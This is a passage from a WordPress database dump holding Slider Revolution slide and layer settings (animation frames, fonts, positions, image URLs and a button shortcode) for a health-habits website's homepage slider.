To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"900\",\"e\":true},\"n\":{\"v\":\"900\",\"e\":true},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\",\"e\":true},\"t\":{\"v\":\"1200px\"},\"m\":{\"v\":\"1200px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"512px\",\"e\":true},\"t\":{\"v\":\"512px\"},\"m\":{\"v\":\"511px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"105px\"},\"m\":{\"v\":\"118px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1010},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(4,2,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slide3-background.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"effects\":{\"parallax\":\"9\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slider1-graphic1.png\",\"imageId\":1043},\"size\":{\"width\":{\"d\":{\"v\":\"65px\",\"e\":true},\"n\":{\"v\":\"65px\",\"e\":true},\"t\":{\"v\":\"65px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"52px\",\"e\":true},\"n\":{\"v\":\"52px\",\"e\":true},\"t\":{\"v\":\"52px\"},\"m\":{\"v\":\"52px\",\"e\":true}},\"originalWidth\":65,\"originalHeight\":52,\"aspectRatio\":{\"d\":{\"v\":1.25},\"n\":{\"v\":1.25},\"t\":{\"v\":1.25},\"m\":{\"v\":1.25}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"-139px\",\"e\":true},\"t\":{\"v\":\"-139px\"},\"m\":{\"v\":\"-175px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"speed\":500,\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Build good habits with us in no time\",\"alias\":\"Start Healthy Life i...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"805px\",\"e\":true},\"n\":{\"v\":\"805px\",\"e\":true},\"t\":{\"v\":\"805px\"},\"m\":{\"v\":\"382px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"805px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-27px\",\"e\":true},\"n\":{\"v\":\"-25px\",\"e\":true},\"t\":{\"v\":\"-25px\"},\"m\":{\"v\":\"-30px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Quicksand \",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"900\",\"e\":true},\"n\":{\"v\":\"900\",\"e\":true},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"50px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\",\"e\":true},\"t\":{\"v\":\"1200px\"},\"m\":{\"v\":\"1200px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"512px\",\"e\":true},\"t\":{\"v\":\"512px\"},\"m\":{\"v\":\"511px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"105px\",\"e\":true},\"t\":{\"v\":\"105px\"},\"m\":{\"v\":\"118px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":1010},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.out\",\"speed\":1000,\"start\":1010,\"startRelative\":1010},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoy